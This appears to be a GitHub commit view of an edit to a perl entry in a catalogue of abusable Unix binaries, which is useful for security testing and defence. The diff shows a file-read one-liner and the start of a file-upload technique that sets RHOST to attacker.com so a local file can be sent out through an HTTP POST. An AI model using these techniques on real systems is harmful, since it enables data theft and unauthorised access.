Update perl.md

This commit is contained in:
Dmitrijs Trizna 2023-10-05 11:59:58 +02:00 committed by GitHub
parent 0038e022c0
commit 099d25e9b9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -7,7 +7,7 @@ functions:
LFILE=file_to_read
perl -ne print $LFILE
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request.
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=8080